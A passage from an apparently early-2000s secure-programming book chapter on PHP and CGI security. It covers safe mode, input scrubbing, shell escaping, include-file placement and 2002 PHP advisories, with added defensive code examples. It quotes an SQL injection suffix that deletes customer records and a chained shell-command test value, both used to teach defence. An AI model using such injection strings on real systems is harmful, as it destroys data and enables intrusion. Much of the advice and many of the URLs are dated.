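    return ($raw =~ /^(\w{1,32})$/) ? "$1.log" : undef;
}

# Open the file for appending, reporting every failure mode to the caller.
# Returns ($filehandle, undef) on success or (undef, $reason) on failure.
sub open_private_log {
    my ($name) = @_;
    umask(077);                                  # anything we create: 0600 at most
    my $fh;
    # Try to create it ourselves. O_EXCL fails if something is already there,
    # so a pre-planted file or symlink cannot be opened silently.
    if (sysopen($fh, $name, O_WRONLY | O_CREAT | O_EXCL | O_APPEND, 0600)) {
        return ($fh, undef);
    }
    return (undef, "cannot create $name: $!") unless $! == EEXIST;

    # It exists already: confirm it is our own regular file with a tight mode.
    my @st = lstat($name) or return (undef, "lstat $name: $!");
    return (undef, "$name is a symbolic link")        if -l _;
    return (undef, "$name is not a regular file")     unless -f _;
    return (undef, "$name is owned by another user")  unless $st[4] == $>;
    return (undef, "$name is readable by others")     if $st[2] & 0077;
    # O_NOFOLLOW (Linux/BSD) closes the window between lstat() and open().
    sysopen($fh, $name, O_WRONLY | O_APPEND | O_NOFOLLOW)
        or return (undef, "cannot open $name: $!");
    return ($fh, undef);
}

# Entry point: in a real CGI the list name would come from the parsed query.
enter_work_dir($WORK_DIR);
my $name = safe_name($ARGV[0] // 'visitors') or die "Rejected file name\n";
my ($fh, $err) = open_private_log($name);
die "$err\n" if $err;
print {$fh} scalar(localtime), " visit recorded\n";
close($fh) or die "close $name: $!\n";
```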


PHP 


PHP is a general-purpose scripting language especially suited for Web development. 
Unlike many other languages prevalent in CGI, PHP resides within HTML code. 
When the client submits this code to the server (Apache, in this case), the server 
(typically through a PHP module or interpreter) executes PHP-nested commands. 


Some typical configurations: 
• PHP to Apache to MySQL
• PHP to Oracle AppServer to Oracle via Oracle Call Interface
• PHP to IIS to SQLServer


PHP holds several advantages over other similar technologies. One is its speed 
(coupled with MySQL on record sets with less than five million entries, PHP + 
Apache + MySQL outpaces even JSP + Oracle and most ODBC-reliant client-to-server 
Web configurations). 
Another advantage (and disadvantage) is PHP’s ability to nest in HTML. This
provides rapid application development for the Web. Developers can quickly use this
combination to construct complex Web applications, wrapping HTML around functional
PHP code.


However, such configurations invite developers to fuse interface code (HTML, 
JavaScript, VBScript) with logic code (PHP code that performs database lookups or 
other useful functions). This fosters problems that—while not traditionally security 
issues—create hospitable environments for security holes, even if merely through the 
banal condition of disorganization. 


Conventional wisdom warns against fusing interface and operational code, although 
some languages force this on you (Microsoft Visual Basic, Envelop, Tcl/TK, and so 
on). However, in such languages, you typically create functions to perform often- 
called procedures, so you write them only once. You should do this with PHP too, 
but many inexperienced developers don’t. 


NOTE 

Instead of spreading out your PHP functions in many different files (whether they're .php or 
.phtml files), centralize and deposit these into include files. You can call these using 
include(). You can then use data derived from and returned by these functions in layout 
directives nested in HTML. This way, your logic code remains isolated from your interface 
code, and remains centralized, as C or C++ libraries are. 


PHP has had a significant security history relevant to programming. Let’s briefly 
cover that history now. 


Issues Central to PHP Programming Security 


PHP is an excellent language choice. However, like Perl and other similar tools, PHP
is powerful and can reach into any system area. For this reason, approach PHP development
with appropriate caution. To compare the difference, consider a C-based CGI
application. It can rarely execute system calls or retrieve environment variables
unless you first expressly include this functionality.


Because PHP also functions as a general-purpose scripting language suitable for 
system administration (similar to Perl or the shells), it inherits certain issues you 
cannot ignore. One relates to environment. 


NOTE 


You can use PHP either through module access to Apache (preferred), or in a standard CGI 
scripting language context, where script files call the PHP interpreter, similarly to how people 
historically used (and sometimes still use) Perl. If possible, go with module support rather than 
using the interpreter. Not only does this offer more speed, but it also invites fewer security 
hazards. 
PHP and Environment

Unlike many other languages, PHP interfaces with your underlying operating system 
in a way similar to shells. It therefore assumes values for certain variables. For 
example, consider this code: 


<?
$p = $PATH;
$v = split(":", $p);
for ($i = 0; $i < count($v); $i++) {
    print "$v[$i]<br>";
}
?>


Here, like a thousand shell scripts or batch files you’ve seen, PHP pulls the path 
available to the Web server, flows it into an array, and prints out each value. When 
aimed at Apache, output will vary depending on your configuration, but PHP will 
print out the path 


/sbin
/usr/sbin
/bin
/usr/bin
/usr/X11R6/bin


It does the same when you use it as a garden-variety scripting tool, although these 
values will differ again, depending on the user PHP executes as. Here’s the code: 


#!/bin/php
<?
$p = $PATH;
$v = split(":", $p);
for ($i = 0; $i < count($v); $i++) {
    print "$v[$i]\n";
}
?>


Here’s the result, executed by root: 


/adabas/bin
/adabas/pgm
/usr/bin
/bin
/usr/local/bin
/usr/X11R6/bin
/home/anonymous/bin
Or, at the extreme, consider this code:


#!/bin/php
<?
$p = `set`;
$v = split(":", $p);
for ($i = 0; $i < count($v); $i++) {
    print "$v[$i]\n";
}
?>


Here’s the result: 


X-Powered-By: PHP/4.0.0
Content-type: text/html

BASH=/bin/sh
BASH_ENV=/home/anonymous/.bashrc
BASH_VERSION=1.14.7(1)
DBCONFIG=/adabas/sql
DBROOT=/adabas
DBWORK=/adabas/sql
EUID=0
HISTSIZE=1000
HOME=/root
HOSTTYPE=i386
IFS=
INPUTRC=/etc/inputrc
KDEDIR=/usr
LANG=en_US
LD_LIBRARY_PATH=/adabas/lib
LESSOPEN=|/usr/bin/lesspipe.sh %s
LOGNAME=anonymous
LS_COLORS=no=00
fi=00
di=01;34
ln=01;36
pi=40;33
so=01;35
bd=40;33;01
cd=40;33;01
or=01;05;37;41
mi=01;05;37;41
ex=01;32
*.cmd=01;32
*.exe=01;32
*.com=01;32
*.btm=01;32
*.bat=01;32
*.sh=01;32
*.csh=01;32
*.tar=01;31
*.tgz=01;31
*.arj=01;31
*.taz=01;31
*.lzh=01;31
*.zip=01;31
*.z=01;31
*.Z=01;31
*.gz=01;31
*.bz2=01;31
*.bz=01;31
*.tz=01;31
*.rpm=01;31
*.cpio=01;31
*.jpg=01;35
*.gif=01;35
*.bmp=01;35
*.xbm=01;35
*.xpm=01;35
*.png=01;35
*.tif=01;35

MAIL=/var/spool/mail/anonymous
OPTERR=1
OPTIND=1
OSTYPE=Linux
PATH=/adabas/bin
/adabas/pgm
/usr/bin
/bin
/usr/local/bin
/usr/X11R6/bin
/home/anonymous/bin
PPID=4134
PS4=+
PWD=/root
QTDIR=/usr/lib/qt-2.1.0
SHELL=/bin/bash
SHLVL=3
SSH2_CLIENT=63.69.110.194 1558 63.69.110.193 22
TERM=vt100
UID=0
USER=anonymous
USERNAME=
_=/usr/local/bin/php


Note that here, PHP calls not a utility located in a directory (a binary executable like 
/bin/date), but instead a built-in shell command. Hence, PHP is shell-aware, and 
provides shell-based and other such variables globally. Therefore, hardcode variables 
in PHP or make them inaccessible. If you don’t, outsiders might find a way to pass 
arbitrary values back. 


NOTE 


I’ve seen varied approaches to this—and not every approach was well considered. For 
example, one development team (at a bank, no less) made tests of origin (that is, if the 
request didn’t initiate on localhost, PHP rejected it). For reasons you can well imagine, that 
didn’t work out (spoofing is relatively simple). 





Finally, note that in some cases, remote attackers can set certain variables in GET or 
other HTTP methods. It’s therefore worth your time to create a function that you 
include in every script that checks for this, and combine it with mod_usertrack (such 
as where you have concerns about variables like HTTP_REMOTE_USER). 


PHP Safe Mode 

You should also consider running PHP in safe mode. Safe mode (a state that you 
achieve via php.ini settings, as described later) prevents PHP scripts from launching 
from anywhere but the location you specify. 


Think of safe mode as similar to (but more powerful than) Apache’s suexec feature. It
enables you to specify where PHP scripts launch from and denies those PHP scripts
the right to execute external programs. That is, safe mode prohibits PHP scripts from
running any program that does not reside within the restricted environment you
specify.




To establish and manipulate PHP’s safe mode, you use one, more, or all of the 
following six directives: 


• safe_mode—Takes one argument (on or off). If off, safe_mode remains
disabled. If on, safe_mode enables you to use the other directives associated
with it.

• open_basedir—Limits the files that PHP can open to only those files located in
the directory tree you specify.

• safe_mode_exec_dir—Specifies the directory from which PHP can launch
programs.

• safe_mode_allowed_env_vars—Use this to specify what environment variables
you’d like to allow PHP to access.

• safe_mode_protected_env_vars—Use this to specify what environment variables
scripts cannot access.

• disable_functions—Use this to prohibit PHP from running certain functions.
Table 12.3 lists functions that disable_functions disables.


NOTE


Note that disable_functions doesn’t completely disable the following functions. Rather, it 
restricts them to certain rules inherent in safe_mode. 


TABLE 12.3 Functions You Can Disable with disable_functions


Function               Description

chdir()                If the target directory has the same UID as your PHP script, PHP
                       will allow the function. If not, it won’t.

chgrp()                If the target file or directory has the same UID as your PHP
                       script, PHP will allow the function. If not, it won’t.

chmod()                If the target file or directory has the same UID as your PHP
                       script, PHP will allow the function. If not, it won’t.

chown()                If the target file or directory has the same UID as your PHP
                       script, PHP will allow the function. If not, it won’t.

copy()                 If the target file or directory has the same UID as your PHP
                       script, PHP will allow the function. If not, it won’t.

dbase_open()           If the target file or directories have the same UID as your PHP
                       script, PHP will allow the function. If not, it won’t.

dbmopen()              If the target file or directories have the same UID as your PHP
                       script, PHP will allow the function. If not, it won’t.

dl()                   safe_mode disables this function altogether.

exec()                 This limits execution to those executable files specified in
                       safe_mode_exec_dir.

filepro()              If the target file or directories have the same UID as your PHP
                       script, PHP will allow the function. If not, it won’t.

filepro_retrieve()     If the target file or directories have the same UID as your PHP
                       script, PHP will allow the function. If not, it won’t.

filepro_rowcount()     If the target file or directories have the same UID as your PHP
                       script, PHP will allow the function. If not, it won’t.

getallheaders()        This instructs PHP not to return Authorization headers.

link()                 If the target file or directory has the same UID as your PHP
                       script, PHP will allow the function. If not, it won’t.

mkdir()                If the target directory has the same UID as your PHP script, PHP
                       will allow the function. If not, it won’t.

move_uploaded_file()   If the target file or directories have the same UID as your PHP
                       script, PHP will allow the function. If not, it won’t.

passthru()             This limits execution to those executable files specified in
                       safe_mode_exec_dir.

pg_loimport()          If the target file or directories have the same UID as your PHP
                       script, PHP will allow the function. If not, it won’t.

popen()                This limits execution to those executable files specified in
                       safe_mode_exec_dir.

posix_mkfifo()         If the target directory has the same UID as your PHP script, it
                       will execute the specified function. If not, it won’t.

putenv()               Allows manipulation of only those variables that meet the criteria
                       in your previously-specified safe_mode_protected_env_vars and
                       safe_mode_allowed_env_vars ini-directives.

rename()               If the target file or directory has the same UID as your PHP
                       script, PHP will allow the function. If not, it won’t.

rmdir()                If the target file or directory has the same UID as your PHP
                       script, PHP will allow the function. If not, it won’t.

shell_exec()           safe_mode disables this function altogether.

symlink()              If the target file or directory has the same UID as your PHP
                       script, PHP will allow the function. If not, it won’t.

system()               This limits execution to those executable files specified in
                       safe_mode_exec_dir.

touch()                If the target file or directory has the same UID as your PHP
                       script, PHP will allow the function. If not, it won’t.

unlink()               If the target file or directory has the same UID as your PHP
                       script, PHP will allow the function. If not, it won’t.
However, the serious problems with PHP—as with any language—lie in developers’
failure to adequately screen user input.


User Input Validation and Screening 

The problem with PHP (and Perl, to perhaps a lesser extent) is that it operates on
multiple underlying systems on your server. Not only is it shell-aware and
shell-enabled, it will also likely be database-aware. A poorly considered table-naming
strategy and insufficient efforts to screen user input together make disasters.


For example, a typical SQL statement called from within PHP and destined for 
MySQL might look like this: 


mysql_db_query($DB, "SELECT * FROM table WHERE value=X");


Suppose, for sake of argument, that you're a lazy developer who names tables in 
unimaginative ways. For example, you might name the table customers and value 
index (to indicate an auto-incremented index number and primary key for each 
registered customer). This would make a cracker’s job of guessing your table and field 
names easy. From there—if you also failed to institute stringent input validation—an 
attacker might append something like this: 


;DELETE * FROM customers WHERE index>0


If you also granted the PHP/MySQL user DELETE privileges, you’d be in a heap of 
trouble. PHP would dutifully delete all your customer records. 


NOTE — — oo 
The preceding example really makes two points. One is overt: Bad naming and poor or no 
input validation is dangerous. However, another somewhat less overt issue is this: When you 
expand Apache's capabilities with modules, databases, and other tools, each introduces new 
security issues. For instance, the preceding example shows how bad naming conventions, no 
input validation, and lax database permissions can work in concert. If, for example, you did 
not grant DELETE privileges in MySQL to the PHP/MySQL user, the above attack wouldn’t 
work out. Hence, to secure your system, you must learn all security procedures for all technologies you graft to Apache. Miss one, and you’re asking for trouble.





Input filtering works in PHP much like Perl. The quick down-and-dirty method is to merely replace unwanted characters with another value via a regular expression function. Many folks convert them to white space:


$args = preg_replace("/[^A-Za-z0-9]/", " ", $args);
This is good, providing that white space doesn’t break the function that receives $args. Hence, you might consider handling multiple white space characters prior to passing $args to a function or command.


NOTE 


Metacharacters aren't the only things to filter, either. Certain words have significance in a 
database context, such as LIKE, WHERE, and SELECT. 
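The scrub shown above, the keyword concern in the note, and the customers query from earlier, carried through in one added example (not the book’s code). It assumes a table customers with an integer column id, and uses an in-memory SQLite database through PDO in place of MySQL so that it runs offline; the point is that the value is bound as a parameter and never becomes part of the SQL text.

```php
<?php
// Added example (not from the book): scrub, validate, then bind.
// Assumptions: table "customers" with integer column "id"; SQLite in memory
// stands in for MySQL.

// The book's scrub, plus collapsing the white space it leaves behind.
function scrubArgument(string $args): string
{
    $args = preg_replace('/[^A-Za-z0-9]/', ' ', $args);
    $args = preg_replace('/\s+/', ' ', $args);
    return trim($args);
}

// Words with meaning to the database survive a character-class scrub intact,
// which is the note's point; detect them separately.
function containsSqlKeyword(string $clean): bool
{
    return preg_match('/\b(select|insert|update|delete|drop|union|where|like)\b/i', $clean) === 1;
}

// A record number must be all digits and of sane length. Everything else,
// including the book's ";DELETE ..." suffix, is refused with null.
function parseRecordId(string $raw): ?int
{
    $clean = scrubArgument($raw);
    if ($clean === '' || !ctype_digit($clean) || strlen($clean) > 9) {
        return null;
    }
    return (int) $clean;
}

// The unsafe form from the text: the raw value is pasted into the statement.
// Kept only for contrast; it is never executed here.
function unsafeQuery(string $raw): string
{
    return "SELECT * FROM customers WHERE id=" . $raw;
}

// The safe form: validate, then bind. Even if validation were bypassed, a
// bound parameter cannot change the meaning of the statement.
function findCustomer(PDO $db, string $raw): ?array
{
    $id = parseRecordId($raw);
    if ($id === null) {
        return null;
    }
    $stmt = $db->prepare('SELECT id, name FROM customers WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed data and inputs.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE customers (id INTEGER PRIMARY KEY, name TEXT)');
$db->exec("INSERT INTO customers (id, name) VALUES (42, 'Alice'), (43, 'Bob')");

$inputs = ['42', '42;DELETE FROM customers WHERE id>0', 'select', str_repeat('9', 20)];
echo "unsafe text would have been: ", unsafeQuery($inputs[1]), "\n";
foreach ($inputs as $raw) {
    $clean = scrubArgument($raw);
    printf("%-40s scrubbed=%-42s keyword=%-3s row=%s\n",
        $raw,
        '"' . $clean . '"',
        containsSqlKeyword($clean) ? 'yes' : 'no',
        json_encode(findCustomer($db, $raw)));
}
printf("rows left: %d\n", $db->query('SELECT COUNT(*) FROM customers')->fetchColumn());
```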





PHP enables you to perform data validation in innumerable ways, but it also ships 
with two built-in functions for this purpose: 


• escapeshellarg()

• escapeshellcmd()


escapeshellarg()  escapeshellarg(), as per the PHP documentation:


...adds single quotes around a string and quotes/escapes any existing single quotes allowing you to pass a string directly to a shell function and having it be treated as a single safe argument. This function should be used to escape individual arguments to shell functions coming from user input. The shell functions include exec(), system(), and the backtick operator.


This prevents remote attackers from chaining arguments. Thus, if you do build 
commands from user input—a dangerous practice in any situation—consider using 
escapeshellarg(). Use it when you flow user input into a variable and execute some 
external process on that data. PHP will deliver the data as a single argument. 


$ip = escapeshellarg($cgivar);
exec("/usr/bin/nslookup $ip", $ret_strs);


One thing to watch is that escapeshellarg() returns arguments as “argument” and 
not ‘argument’. Moreover, carefully consider what mischief unexpected user input 
can bring (in light of what arguments the target command takes). In almost any 
case, you should scrub the user input prior to sending it through escapeshellarg(). 


escapeshellcmd()  escapeshellcmd(), as per the PHP documentation:


...escapes any characters in a string that might be used to trick a shell command into executing arbitrary commands. This function should be used to make sure that any data coming from user input is escaped before this data is passed to the exec() or system() functions, or to the backtick operator.
Note the difference between escapeshellarg() and escapeshellcmd(). escapeshellcmd() lets you first clear shell metacharacters from user input and then add them (if needed) within your system call. escapeshellarg() instead ensures that arguments are passed on an individual basis.


escapeshellcmd() comes in handy for this: 


$fn = escapeshellcmd($file);
system("path/command \"/path/$fn\"; command \"/path/$fn\"");


Here, you scrub the user input clean (a filename) to prevent any unwanted 
metacharacters from passing through. Then, you call the desired command and add 
metacharacters or escape sequences where you need them. 
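Both fragments above, with the scrubbing step the text asks for placed in front of the escaping, as an added example (not the book’s code). It applies escapeshellarg() and escapeshellcmd() to the same tainted value so the difference is visible; the nslookup path is the book’s, the command lines are built and printed rather than executed, and the host-name pattern is an assumption.

```php
<?php
// Added example (not from the book): escapeshellarg() vs escapeshellcmd(),
// with validation before either is applied.

// Scrub first: nslookup takes a host name or an address, so accept only those
// shapes and refuse everything else before any escaping happens.
function isLookupTarget(string $s): bool
{
    if (filter_var($s, FILTER_VALIDATE_IP) !== false) {
        return true;
    }
    // Host name (assumed pattern): dot-separated labels of letters, digits
    // and inner hyphens, 63 chars per label, 253 overall.
    return strlen($s) <= 253
        && preg_match('/^(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$/', $s) === 1;
}

// The book's nslookup fragment with validation in front of it. Returns the
// command line, or null when the input is refused.
function buildLookupCommand(string $cgivar): ?string
{
    if (!isLookupTarget($cgivar)) {
        return null;
    }
    $ip = escapeshellarg($cgivar);       // delivered as exactly one argument
    return "/usr/bin/nslookup $ip";
}

// The book's second pattern: clear metacharacters from the value with
// escapeshellcmd(), then add the quoting yourself where the command needs it.
function buildFileCommand(string $file): ?string
{
    // escapeshellcmd() leaves "/" and ".." alone, so refuse path components
    // (and NUL bytes, which the escaping functions reject) outright.
    if ($file === '' || strpos($file, '/') !== false || strpos($file, "\0") !== false
        || $file === '.' || $file === '..') {
        return null;
    }
    $fn = escapeshellcmd($file);
    return "path/command \"/path/$fn\"; command \"/path/$fn\"";
}

// Constructed tainted values: a chained command and a file name with a ';'.
$chained  = 'example.com; id';
$filename = 'report;final.txt';

echo "escapeshellarg: ", escapeshellarg($chained), "\n";   // whole value, single-quoted
echo "escapeshellcmd: ", escapeshellcmd($chained), "\n";   // ';' escaped, words still split

var_dump(buildLookupCommand($chained));       // null: fails the host-name check
var_dump(buildLookupCommand('example.com'));  // accepted and quoted as one argument
var_dump(buildFileCommand($filename));        // ';' escaped inside your own quoting
var_dump(buildFileCommand('../secret.txt'));  // null: contains a slash
```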


Include Procedures in PHP 

As I earlier related, you shouldn’t fuse interface and logic code. To get around this, 
you could create C-style library files that PHP can call, typically at the top of a script, 
like this: 


include "url|filename";


Such URLs or files include functions that you'll repeatedly use in many PHP scripts 
across your enterprise. 


Here’s an example: 


function GetPayType($method) {
    switch ($method) {
        case 1: // Credit card
            $pt = 1;
            break;
        case 2: // Check
            $pt = 2;
            break;
        case 3: // Wire
            $pt = 3;
            break;
    }

    if ($pt == "") return "ERROR: no method specified";
    else return $pt;
}
The preceding fragment is a simple function that registers one of three payment methods, or a failure (when PHP can’t determine what happened, or perhaps the user failed to specify). The first issue here centers on the type of includes you call. Never call your includes from a URL. For example, no matter who instructs you differently, never do this:


include "http://cgiserver.yourdomain.net/cgi/globals.inc";


Don’t do it even if the URL is on localhost, attached to the same or a virtual host. 
Here’s why: a) Spoofing by hostname is easy; and b) You cannot guarantee that the 
URL is safe or trusted. Attackers may have altered it. Moreover, just from a reliability 
viewpoint, calls to URLs are chancy. Using them, you rely on the assumption that 
Apache will function correctly on the target machine, that the file is unchanged, 
that the file still exists, that it’s still where it’s supposed to be, and that there’s an 
open communication channel between your localhost and the target domain 
storing the include file. 


The second issue concerns naming. Many developers name such include files with 
extensions of .inc, .h, .c, .cc, .func, .lib, or .include. These extensions are 
expressive and easy to guess, and crackers will try to isolate files named this way 
first. 


The third issue is where you place these files. Never place them beneath 
DocumentRoot. Here’s why: Suppose you named your files with an .inc extension 
anyway. Attackers trying widely varied filenames (globals.inc, functions.inc, and
so on) might land on a file that actually exists. Suppose they do. What will Apache 
do when it processes the attacker’s request? Naturally, it will send the file to the 
attacker’s Web client. And because clients don’t generally have a provision for 
handling files with an .inc extension, the attackers will receive your include file’s 
source code (something that should never happen). 


NOTE 


One approach is to name these files with a PHP extension, place a filter at initialization to 
block arguments, and below this, insert a routine that a) pulls exhaustive information from 
any client that sends such strings for enhanced logging; and b) returns an error, or simply 
jettisons the requesting client back to home. 
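The guard the note describes, written out as an added example (not the book’s code). It assumes the include file is named lib_payment.php, is stored outside DocumentRoot, and that "home" is the site root; when a Web client requests the file by URL instead of a script including it, the request is logged in detail and the client is sent home.

```php
<?php
// Added example (not from the book): guard at the top of an include file
// (assumed name: lib_payment.php). Library functions follow the guard.

// True when this file itself is the script Apache executed, i.e. a client
// requested it by URL rather than a script including it.
function requestedDirectly(string $thisFile): bool
{
    $entry = $_SERVER['SCRIPT_FILENAME'] ?? '';
    return $entry !== '' && realpath($entry) === realpath($thisFile);
}

// Pull what the note calls "exhaustive information" about the client into a
// single log line. Every value comes from the request and is untrusted, so
// control characters are replaced to stop an attacker forging extra log lines.
function describeClient(array $server): string
{
    $fields = ['REMOTE_ADDR', 'REQUEST_METHOD', 'REQUEST_URI', 'QUERY_STRING',
               'HTTP_USER_AGENT', 'HTTP_REFERER', 'HTTP_X_FORWARDED_FOR'];
    $parts = [];
    foreach ($fields as $f) {
        $v = preg_replace('/[\x00-\x1f\x7f]/', '?', (string) ($server[$f] ?? '-'));
        $parts[] = $f . '=' . $v;
    }
    return implode(' ', $parts);
}

// Log, then send the client home (a 403 response is the other option the
// note mentions; choose one and apply it consistently).
function rejectDirectRequest(string $home): void
{
    error_log('direct include access: ' . describeClient($_SERVER));
    header('Location: ' . $home, true, 302);
    exit;
}

// The filter "at initialization": nothing below runs for a direct request.
// Skipped under the CLI so the library can still be unit-tested from a shell.
if (PHP_SAPI !== 'cli' && requestedDirectly(__FILE__)) {
    rejectDirectRequest('/');
}

// ---- library code proper begins here ----
// (the functions your scripts include this file for, e.g. GetPayType())
```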





Conditional Processing: Surveying the Possibilities 

Before committing a function to source, ask yourself this: Did you anticipate every 
conceivable result of a function call? Did you anticipate every conceivable value that 
could pass to your function? 
Take another look at the sample code that ascertains a client’s payment method:


function GetPayType($method) {
    switch ($method) {
        case 1: // Credit card
            $pt = 1;
            break;
        case 2: // Check
            $pt = 2;
            break;
        case 3: // Wire
            $pt = 3;
            break;
    }

    if ($pt == "") return "ERROR: no method specified";
    else return $pt;
}


Something is wrong, and if you look for just a moment, you'll see it. The function 
GetPayType() doesn’t adequately handle every contingency. It returns either an error 
or $pt’s value, but only providing that 


• $pt = 1
• $pt = 2
• $pt = 3
• $pt = ""


What if the value passed in $method is instead a 5000-character string? True, the script might not assign $pt anything, but equally, it wouldn’t return the error. So what would happen? Answer: That would depend on other factors. Perhaps nothing, or if functions that need $pt receive it as NULL, or worse, receive nothing, they might do something unintended (unless they contain code that expects and deals with such happenings). Such black holes, or unknowns, are things you never want to leave open. Thus, carefully consider every possible contingency.
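GetPayType() with every contingency closed, as an added example (not the book’s code). The three payment codes are the book’s; signalling failure with null rather than an error string, so the function returns one type, is an assumption, and the sample inputs are constructed to cover the cases the text raises, the 5000-character string included.

```php
<?php
// Added example (not from the book): GetPayType() with a defined outcome for
// every input, plus a caller that handles the failure path.

const PAY_TYPES = [1 => 'Credit card', 2 => 'Check', 3 => 'Wire'];

// Returns the payment type code, or null when $method is anything other than
// exactly "1", "2" or "3". The default branch closes the "black hole" the
// text describes: a 5000-character string, "", "1abc", 1.5, null and an array
// all end in the same explicit failure path.
function GetPayType($method): ?int
{
    // Only scalars can be a method code; refuse arrays, objects, bools and
    // floats first rather than letting a cast decide.
    if (!is_int($method) && !is_string($method)) {
        return null;
    }
    $s = is_int($method) ? (string) $method : $method;
    if (!ctype_digit($s) || strlen($s) > 1) {
        return null;                       // not a single digit
    }
    $code = (int) $s;
    switch ($code) {
        case 1:                            // Credit card
        case 2:                            // Check
        case 3:                            // Wire
            return $code;
        default:                           // 0, 4..9: a digit, but not a method
            return null;
    }
}

// Callers must deal with the failure too, instead of passing a null on to
// code that expects 1, 2 or 3.
function describePayType($method): string
{
    $pt = GetPayType($method);
    if ($pt === null) {
        return 'ERROR: no valid payment method specified';
    }
    return PAY_TYPES[$pt];
}

// Constructed inputs covering the contingencies the text raises.
$samples = [1, '2', '3', '', ' ', '1abc', '4', '01', 1.5, str_repeat('A', 5000), [1], null];
foreach ($samples as $m) {
    if (is_array($m)) {
        $label = 'array';
    } elseif ($m === null) {
        $label = 'null';
    } else {
        $label = '"' . substr((string) $m, 0, 12) . '"';
    }
    printf("%-16s -> %s\n", $label, describePayType($m));
}
```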


PHP-Specific Security Issues 


PHP also had two serious security issues arise in February and March 2002. These include


• File upload boundary checks

• Heap overflows
Buffer overflows in php_mime_split in PHP 4.1.0, 4.1.1, and 4.0.6 and earlier, and php3_mime_split in PHP 3.0.x allowed remote attackers to execute arbitrary code via a multipart/form-data HTTP POST request when file_uploads were enabled in php.ini. Initially, this was billed as a bug whereby attackers could only crash Apache. Exploit code from Gabriel A. Maggiotti demonstrating that approach is available at http://qb0x.net/. However, PHP developers later released an advisory indicating otherwise.


PHP 3.0.10-3.0.18, 4.0.1-4.0.3pl1, 4.0.2-4.0.5, 4.0.6-4.0.7RC2, and 4.0.7RC3-4.1 were all affected. However, crackers enjoyed different results on different platforms (Linux, Solaris, and SolarisX86 were reportedly most affected). The heap overflows, in contrast, affected only PHP 4.0.1-4.0.3pl1. In both cases, the solution is to upgrade.


Interesting Security Programming and Testing Tools 


Finally, Table 12.4 lists some interesting tools that can help you test your work. 


TABLE 12.4 Interesting Programming and Testing Tools


Tool            Purpose


lclint          This is a lint-like checker for ANSI C that checks risky data sharing, ignored return values, null values, memory management errors and much, much more. For a description of lclint, go to http://www.doc.ic.ac.uk/lab/cplus/lclint/guide.html. To get lclint, go to ftp://ftp.sds.lcs.mit.edu/pub/lclint/guide.tar.gz.

C Within        A source code viewer that lets you selectively examine the results of preprocessing to determine what macros really expand to. Get it at http://www.thinkage.ca/english/index.shtml.

GNU Nana        A free library providing improved support for assertion checking and logging in C and C++. Learn more at http://www.cs.ntu.edu.au/homepages/pjm/nana-home/.

Insure          Insure’s Insure++ detects crash-causing errors in C/C++ applications. Using mutation testing, Insure++ examines and tests the code, reports errors, and pinpoints the errors’ exact locations. Insure++ also performs coverage analysis, indicating which sections of the code were tested. Find out more at http://www.parasoft.com/jsp/products/home.jsp?product=Insure.

mpatrol         The mpatrol library is a powerful debugging tool that attempts to diagnose run-time errors caused by the incorrect use of dynamically allocated memory. It acts as a malloc() debugger for debugging dynamic memory allocations, although it can also trace and profile calls to malloc() and free(). Find out more at http://www.cbmamiga.demon.co.uk/mpatrol/.

Purify          Purify, from Rational, is a runtime error and memory leak detector. It runs after compilation, and post-processes the object modules from which an executable is generated, producing an executable with runtime error checking inserted into the object code. As the code is executed, all memory accesses are validated to detect and report errors at the time of occurrence. Purify also reports memory leaks, showing where memory has been allocated, but to which there are no pointers, so that it can never be used or freed. Learn more about it at http://www.rational.com/.

ObjectManual    Generates HTML documentation for your C++ programs on-the-fly (especially useful if you’re doing professional development). Find out more at http://www.obsoft.com/Product/ObjMan.html.

DOC++           A tool for generating HTML documentation for your C/C++/Java programs on-the-fly (especially useful if you’re doing professional development, or where you’re accountable for the docs). More information can be found at http://docpp.sourceforge.net.

cgihtml         A library for writing HTML out from C programs (useful when you don’t want to bother coding HTML parsing routines yourself). To get it, go to http://www.eekim.com/software/cgihtml/.

MIME++          A C++ class library for parsing, creating, and editing messages in MIME format, it can streamline your work in many instances. Get it at http://www.hunnysoft.com/mimepp/.

Latro           Scans remote Windows hosts for insecure Perl installations (useful when you establish a heterogeneous intranet). Get it at http://language.perl.com/news/latro-announce.html.

msystem         Offers secure versions of system(3), popen(3), and pclose(3). Check out msystem at ftp://coast.cs.purdue.edu/pub/tools/unix/msystem.tar.Z.

crashme         A tool for testing your operating environment software’s robustness. In certain cases, it can reveal weaknesses in your programs. Check out crashme at ftp://coast.cs.purdue.edu/pub/tools/unix/crashme/.

showid          A shell script that records and reports the UID and GID of a program while it is executing. Check out showid at ftp://coast.cs.purdue.edu/pub/tools/unix/show_effective_uid.

worm-src        The source code to the Internet Worm, an excellent example of how buffer overruns and other attacks operate. Get it at ftp://coast.cs.purdue.edu/pub/tools/unix/worm-src.tar.gz.

PAM             PAMs (Pluggable Authentication Modules) are modules that enable you to alter how Linux applications perform authentication without actually rewriting and compiling them. Learn more at http://www.linuxdoc.org/HOWTO/User-Authentication-HOWTO/x101.html.

CGIWrap         CGIWrap is a gateway program that enables general users to use CGI scripts and HTML forms without compromising the security of the http server. (Scripts run with the permissions of the user who owns the script.) Check out CGIWrap at ftp://concert.cert.dfn.de/pub/tools/net/cgiwrap/.





Other Online Resources 


In addition to the information here, there are many online documents that offer 
excellent secure programming advice. Here are a few: 


“CGI Security Tutorial,” Michael Van Biesbrouck. http://www.csclub.uwaterloo.ca/u/mlvanbie/cgisec/.


“How to Write a Setuid Program,” Matt Bishop. http://nob.cs.ucdavis.edu/~bishop/papers/Pdf/sproglogin.pdf.


“Robust Programming,” Matt Bishop. http://nob.cs.ucdavis.edu/~bishop/classes/ecs153-1998-winter/Pdf/robust.pdf.


“Security Code Review Guidelines,” Adam Shostack. http://packetstorm.widexs.nl/programming-tutorials/code.review.html.


“Shifting the Odds: Writing (More) Secure Software,” Steve Bellovin, AT&T Research, Murray Hill, NJ. http://www.research.att.com/~smb/talks/odds.ps.


“The Unofficial Web Hack FAQ,” Simple Nomad. http://www.nmrc.org/faqs/www/index.html.


“The World Wide Web Security FAQ,” Lincoln D. Stein. http://www.w3.org/Security/Faq/www-security-faq.html.


